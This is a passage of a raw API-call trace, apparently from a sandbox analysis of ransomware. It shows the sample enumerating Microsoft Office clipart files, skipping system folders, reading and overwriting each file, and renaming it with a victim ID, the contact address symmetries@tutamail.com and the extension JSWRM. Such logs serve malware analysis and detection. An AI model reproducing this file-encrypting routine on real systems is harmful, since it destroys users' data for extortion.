Size=0x20) returned 0x240ef8 [0096.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00732_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00732_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00732_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.790] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5116) returned 1 [0096.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13f0) returned 0x205850 [0096.790] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13f0, lpOverlapped=0x0) returned 1 [0096.791] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.792] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13f0, lpOverlapped=0x0) returned 1 [0096.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.792] CloseHandle (hObject=0x314) returned 1 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0096.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0096.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0096.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0096.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0096.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.793] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x660, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00734_.WMF", cAlternateFileName="")) returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2=".") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="..") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="...") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="windows") returned -1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="recovery") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="perflogs") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="documents and settings") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="system volume information") returned -1 [0096.793] lstrcmpiW (lpString1="SO00734_.WMF", lpString2="msocache") returned 1 [0096.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00734_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00734_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00734_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0096.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00734_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00734_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00734_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.794] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1632) returned 1 [0096.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x660) returned 0x22d530 [0096.794] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x660, lpOverlapped=0x0) returned 1 [0096.796] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.796] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x660, lpOverlapped=0x0) returned 1 [0096.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0096.796] CloseHandle (hObject=0x314) returned 1 [0096.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0096.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0096.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0096.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0096.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0096.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0096.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.797] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00735_.WMF", cAlternateFileName="")) returned 1 [0096.797] lstrcmpiW (lpString1="SO00735_.WMF", lpString2=".") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="..") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="...") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="windows") returned -1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="recovery") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="perflogs") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="documents and settings") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="system volume information") returned -1 [0096.798] lstrcmpiW (lpString1="SO00735_.WMF", lpString2="msocache") returned 1 [0096.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00735_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00735_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00735_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0096.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00735_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00735_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00735_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0096.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.799] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1484) returned 1 [0096.799] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5c0) returned 0x2332c0 [0096.799] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5c0, lpOverlapped=0x0) returned 1 [0096.800] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.800] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5c0, lpOverlapped=0x0) returned 1 [0096.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0096.800] CloseHandle (hObject=0x314) returned 1 [0096.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0096.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0096.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0096.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0096.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0096.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0096.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.802] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x184c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00736_.WMF", cAlternateFileName="")) returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2=".") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="..") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="...") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="windows") returned -1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="recovery") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="perflogs") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="documents and settings") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="system volume information") returned -1 [0096.802] lstrcmpiW (lpString1="SO00736_.WMF", lpString2="msocache") returned 1 [0096.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00736_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00736_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00736_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0096.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00736_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00736_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00736_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0096.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.803] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6220) returned 1 [0096.803] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.803] 